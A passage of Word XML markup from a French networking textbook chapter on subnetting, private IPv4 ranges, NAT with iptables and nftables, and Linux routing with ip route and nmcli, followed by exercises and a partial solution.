                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>/22 ou plus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3103"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Planifier la croissance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UN CHEVAUCHEMENT CASSE LE ROUTAGE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Deux sous-réseaux qui se recouvrent rendent le routage ambigu : certaines adresses sont joignables par deux chemins. Un plan d'adressage se dessine et se documente avant tout déploiement.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>55.3 Adresses privées et NAT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Trois blocs sont réservés aux réseaux privés et ne sont pas routés sur Internet. Le NAT traduit une adresse privée en adresse publique pour sortir.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.192 — Quatre plages réservées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200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Bloc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="350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Plage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="150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Taille</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="200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r>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2003"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>10.0.0.0/8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3506"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>10.0.0.0 – 10.255.255.255</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1502"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>16,7 M</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2003"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Grands réseaux</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="200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172.16.0.0/12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="350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172.16.0.0 – 172.31.255.255</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="150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1 M</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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Réseaux moyens</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2003"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>192.168.0.0/16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3506"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>192.168.0.0 – 192.168.255.255</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1502"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>65 536</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2003"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Maisons, PME</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="200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100.64.0.0/10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="350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100.64.0.0 – 100.127.255.255</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="150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4 M</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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Opérateurs (CGNAT)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Deux écritures du même NAT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NAT sortant (masquerade) sur un routeur Linux</w:t>
        <w:br/>
        <w:t>iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE</w:t>
        <w:br/>
        <w:t>sysctl -w net.ipv4.ip_forward=1</w:t>
        <w:br/>
        <w:br/>
        <w:t># Équivalent nftables</w:t>
        <w:br/>
        <w:t>nft add table ip nat</w:t>
        <w:br/>
        <w:t>nft add chain ip nat postrouting '{ type nat hook postrouting priority 100; }'</w:t>
        <w:br/>
        <w:t>nft add rule ip nat postrouting oifname "eth0" masquerade</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CGNAT</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Carrier-Grade NAT : plusieurs abonnés partagent une adresse publique. Conséquence : l'IPv4 seule ne permet plus d'héberger un service joignable de l'extérieur sans mécanisme dédié.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>IPv6 supprime la pénurie d'adresses : 128 bits, soit un nombre d'adresses considérable. Chaque appareil peut avoir une adresse publique ; la protection repose alors sur le pare-feu, pas sur la traduction d'adresses.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>55.4 Routage</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un hôte compare l'adresse de destination à son masque. Si elle est dans le même réseau, il écrit directement ; sinon, il envoie à la passerelle.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="3238500"/>
            <wp:docPr id="66" name="Picture 66"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f64.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId98"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="3238500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.64 — La décision de routage</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Quatre opérations de routage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ip route</w:t>
        <w:br/>
        <w:t># default via 192.168.1.1 dev eth0</w:t>
        <w:br/>
        <w:t># 192.168.1.0/24 dev eth0 scope link</w:t>
        <w:br/>
        <w:br/>
        <w:t># Ajouter une route vers un réseau interne via un tunnel</w:t>
        <w:br/>
        <w:t>ip route add 10.20.0.0/16 via 192.168.1.5 dev eth0</w:t>
        <w:br/>
        <w:br/>
        <w:t># Route plus spécifique = prioritaire, quelle que soit la métrique</w:t>
        <w:br/>
        <w:t># 10.20.5.0/24 l'emporte sur 10.20.0.0/16</w:t>
        <w:br/>
        <w:br/>
        <w:t># Vérifier le chemin réellement utilisé</w:t>
        <w:br/>
        <w:t>ip route get 10.20.5.17</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.193 — Cinq façons de gérer une route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90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Commande</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="319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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="290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Persistance</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2908"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>ip route add</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3199"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Route immédiate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2908"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Perdue au redémarrage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2908"/>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ip route replace</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="319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Remplace une route</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="290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Immédiate</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2908"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>ip route del</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3199"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Supprime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2908"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Immédiate</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2908"/>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nmcli</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="319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Route persistante</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="290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Survit au redémarrage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2908"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>/etc/network/interfaces</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3199"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Debian classique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2908"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Au redémarrage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Deux routes persistantes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Passerelle par défaut avec NetworkManager</w:t>
        <w:br/>
        <w:t>nmcli connection modify eth0 ipv4.gateway 192.168.1.1</w:t>
        <w:br/>
        <w:t>nmcli connection modify eth0 +ipv4.routes "10.20.0.0/16 192.168.1.5"</w:t>
        <w:br/>
        <w:t>nmcli connection up eth0</w:t>
      </w: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TOUJOURS VÉRIFIER AVEC `IP ROUTE GET`</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Cette commande indique la route réellement choisie pour une destination, ce qui évite de raisonner sur une table incomplète ou mal comprise.</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CONCEVOIR UN PLAN D'ADRESSAGE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Lister les sites, services et liens.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Attribuer un bloc par site, avec marge de croissance.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Documenter réseau, masque, passerelle et VLAN.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Réserver les premières et dernières adresses.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Versionner le plan avec l'infrastructure.</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adresse IPv4 fait 32 bits ; le masque sépare réseau et hôtes.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Deux adresses par sous-réseau sont réservées : réseau et diffusion.</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2^n - 2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> donne le nombre d'hôtes utiles.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/31 et /32 ont des usages particuliers.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Trois blocs sont réservés aux réseaux privés.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NAT traduit les adresses privées pour sortir.</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route la plus spécifique est prioritaire.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ip route get</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> montre la décision réelle.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les adresses circulent. Reste à les nommer : le chapitre suivant traite du DNS.</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55.1 — Découper un /24 en trois sous-réseaux</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Il faut 100, 50 et 20 hôtes.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Choisissez les préfixes.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Calculez les plages.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les chevauchements.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 55.2 — Diagnostiquer un conflit d'adresses</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Deux machines répondent à la même adresse IP.</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Repérez la duplication.</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Identifiez les deux machines.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Corrigez et prévenez.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 55.3 — Vérifier une route asymétrique</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Le serveur répond, mais les connexions TCP n'aboutissent pas.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Vérifiez les tables des deux côtés.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Comparez les chemins aller et retour.</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Corrigez la passerelle.</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55.1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100 hôtes → /25 (126 utiles)  192.168.10.0/25</w:t>
        <w:br/>
        <w:t xml:space="preserve"> 50 hôtes → /26 (62 utiles)   192.168.10.128/26</w:t>
        <w:br/>
